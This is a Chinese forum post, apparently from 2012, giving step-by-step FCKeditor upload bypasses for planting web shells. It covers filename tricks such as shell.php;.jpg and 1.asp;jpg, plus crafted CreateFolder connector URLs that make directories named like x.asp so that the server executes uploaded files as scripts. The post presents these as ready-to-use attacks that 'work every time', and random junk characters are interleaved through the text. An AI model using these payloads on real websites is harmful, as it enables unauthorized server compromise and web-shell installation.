很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg) u f/ K0 e6 U# }& ]
' Y! p0 e' r1 s9 f4 F& r7 C& R
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
2 d2 @6 ~) s* D" J( a" \0 V
8 K2 I' t* B+ m P5 P继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。/ E3 I+ J# |8 y6 n8 g' P: {
" v' U3 o$ ?; u1 d7 P5 s突破建立文件夹:! H( b" g# m* ~" R% m, j+ @
! i4 O. f- w) |7 x Q. C' Weditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
( C0 l# h2 `% m' Q& T5 |
% C0 k [5 W( |( Q8 C; F# W参数:
3 k3 m& u6 K& s- h# G/ D8 ?+ c& ^, x; u3 d2 n6 f; M( L. {
当前目录名:CurrentFolder=/qing.asp
; o! I* c5 L' r/ w! b$ Y; a) z% L+ Z3 l' r- [5 b' r, B: J0 L
新的目录名:NewFolderName=x.asp
- b/ _! c: L. {2 ^" X9 O! Q5 z. A+ T" D* b* W0 e* T# j( x
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……, n, [. P) C- [ i3 |
X# n' N4 b: r1 |那么 x.asp 就已经建立生成了,此方法百试百灵!' |2 R5 j3 ~( ?# A+ ^" A0 r
- l8 x, N, C2 ^- z/ f2 P新建文件夹参数 x.asp,基本都能搞定。
' y d2 U! I* p/ k
. W: A* Y1 x% \, [& ^下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
r$ Y( M4 P J, B. Z. B* P- ]3 f0 i, x9 M3 j, e7 n
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
( E$ q) l1 J. P* ?5 a% w* a
( A2 N" b# X) r" `获取文件列表
! e* F! ^+ W( `" \ aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F @0 u" f1 y( i5 d% z
7 p% m+ b! C' V3 Q$ ^6 Z |
发表于 2012-12-31 09:27:09
收藏
支持
反对